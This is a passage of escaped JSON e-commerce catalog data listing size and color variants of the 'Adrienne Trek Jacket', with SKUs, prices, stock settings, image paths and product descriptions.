Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"adrienne-trek-jacket-xs-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj08-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj08-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj08-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj08-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj08-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Orange\"},\"1256\":{\"sku\":\"WJ08-XS-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Adrienne Trek Jacket-XS-Purple\",\"description\":\"<p>You\'re ready for a cross-country jog or a coffee on the patio in the Adrienne Trek Jacket. Its style is unique with stand collar and drawstrings, and it fits like a jacket should.<\\/p>\\n<p>&bull; gray 1\\/4 zip pullover.<br \\/>&bull; Comfortable, relaxed fit.<br \\/>&bull; Front zip for venting.<br \\/>&bull; Spacious, kangaroo pockets.<br \\/>&bull; 27\\\" body length.<br \\/>&bull; 95% Organic Cotton \\/ 5% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"adrienne-trek-jacket-xs-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj08-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj08-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj08-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj08-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj08-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Purple\"},\"1257\":{\"sku\":\"WJ08-S-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Adrienne Trek Jacket-S-Gray\",\"description\":\"<p>You\'re ready for a cross-country jog or a coffee on the patio in the Adrienne Trek Jacket. Its style is unique with stand collar and drawstrings, and it fits like a jacket should.<\\/p>\\n<p>&bull; gray 1\\/4 zip pullover.<br \\/>&bull; Comfortable, relaxed fit.<br \\/>&bull; Front zip for venting.<br \\/>&bull; Spacious, kangaroo pockets.<br \\/>&bull; 27\\\" body length.<br \\/>&bull; 95% Organic Cotton \\/ 5% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"adrienne-trek-jacket-s-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj08-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj08-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj08-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj08-gray_alt1.jpg,\\/w\\/j\\/wj08-gray_alternate.jpg,\\/w\\/j\\/wj08-gray_back.jpg\",\"image\":\"\\/w\\/j\\/wj08-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj08-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj08-gray_alt1.jpg,\\/w\\/j\\/wj08-gray_alternate.jpg,\\/w\\/j\\/wj08-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Gray\"},\"1258\":{\"sku\":\"WJ08-S-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Adrienne Trek Jacket-S-Orange\",\"description\":\"<p>You\'re ready for a cross-country jog or a coffee on the patio in the Adrienne Trek Jacket. Its style is unique with stand collar and drawstrings, and it fits like a jacket should.<\\/p>\\n<p>&bull; gray 1\\/4 zip pullover.<br \\/>&bull; Comfortable, relaxed fit.<br \\/>&bull; Front zip for venting.<br \\/>&bull; Spacious, kangaroo pockets.<br \\/>&bull; 27\\\" body length.<br \\/>&bull; 95% Organic Cotton \\/ 5% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"adrienne-trek-jacket-s-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj08-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj08-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj08-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj08-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj08-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Orange\"},\"1259\":{\"sku\":\"WJ08-S-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Adrienne Trek Jacket-S-Purple\",\"description\":\"<p>You\'re ready for a cross-country jog or a coffee on the patio in the Adrienne Trek Jacket. Its style is unique with stand collar and drawstrings, and it fits like a jacket should.<\\/p>\\n<p>&bull; gray 1\\/4 zip pullover.<br \\/>&bull; Comfortable, relaxed fit.<br \\/>&bull; Front zip for venting.<br \\/>&bull; Spacious, kangaroo pockets.<br \\/>&bull; 27\\\" body length.<br \\/>&bull; 95% Organic Cotton \\/ 5% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"adrienne-trek-jacket-s-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj08-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj08-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj08-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj08-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj08-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Purple\"},\"1260\":{\"sku\":\"WJ08-M-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Adrienne Trek Jacket-M-Gray\",\"description\":\"<p>You\'re ready for a cross-country jog or a coffee on the patio in the Adrienne Trek Jacket. Its style is unique with stand collar and drawstrings, and it fits like a jacket should.<\\/p>\\n<p>&bull; gray 1\\/4 zip pullover.<br \\/>&bull; Comfortable, relaxed fit.<br \\/>&bull; Front zip for venting.<br \\/>&bull; Spacious, kangaroo pockets.<br \\/>&bull; 27\\\" body length.<br \\/>&bull; 95% Organic Cotton \\/ 5% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"adrienne-trek-jacket-m-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj08-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj08-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj08-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj08-gray_alt1.jpg,\\/w\\/j\\/wj08-gray_alternate.jpg,\\/w\\/j\\/wj08-gray_back.jpg\",\"image\":\"\\/w\\/j\\/wj08-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj08-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj08-gray_alt1.jpg,\\/w\\/j\\/wj08-gray_alternate.jpg,\\/w\\/j\\/wj08-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Gray\"},\"1261\":{\"sku\":\"WJ08-M-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Adrienne Trek Jacket-M-Orange\",\"description\":\"<p>You\'re ready for a cross-country jog or a coffee on the patio in the Adrienne Trek Jacket. Its style is unique with stand collar and drawstrings, and it fits like a jacket should.<\\/p>\\n<p>&bull; gray 1\\/4 zip pullover.<br \\/>&bull; Comfortable, relaxed fit.<br \\/>&bull; Front zip for venting.<br \\/>&bull; Spacious, kangaroo pockets.<br \\/>&bull; 27\\\" body length.<br \\/>&bull; 95% Organic Cotton \\/ 5% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"adrienne-trek-jacket-m-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj08-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj08-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj08-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj08-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj08-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Orange\"},\"1262\":{\"sku\":\"WJ08-M-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Adrienne Trek Jacket-M-Purple\",\"description\":\"<p>You\'re ready for a cross-country jog or a coffee on the patio in the Adrienne Trek Jacket. Its style is unique with stand collar and drawstrings, and it fits like a jacket should.<\\/p>\\n<p>&bull; gray 1\\/4 zip pullover.<br \\/>&bull; Comfortable, relaxed fit.<br \\/>&bull; Front zip for venting.<br \\/>&bull; Spacious, kangaroo pockets.<br \\/>&bull; 27\\\" body length.<br \\/>&bull; 95% Organic Cotton \\/ 5% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"adrienne-trek-jacket-m-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj08-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj08-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj08-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj08-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj08-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Purple\"},\"1263\":{\"sku\":\"WJ08-L-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Adrienne Trek Jacket-L-Gray\",\"description\":\"<p>You\'re ready for a cross-country jog or a coffee on the patio in the Adrienne Trek Jacket. Its style is unique with stand collar and drawstrings, and it fits like a jacket should.<\\/p>\\n<p>&bull; gray 1\\/4 zip pullover.<br \\/>&bull; Comfortable, relaxed fit.<br \\/>&bull; Front zip for venting.<br \\/>&bull; Spacious, kangaroo pockets.<br \\/>&bull; 27\\\" body length.<br \\/>&bull; 95% Organic Cotton \\/ 5% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"adrienne-trek-jacket-l-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj08-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj08-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj08-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_q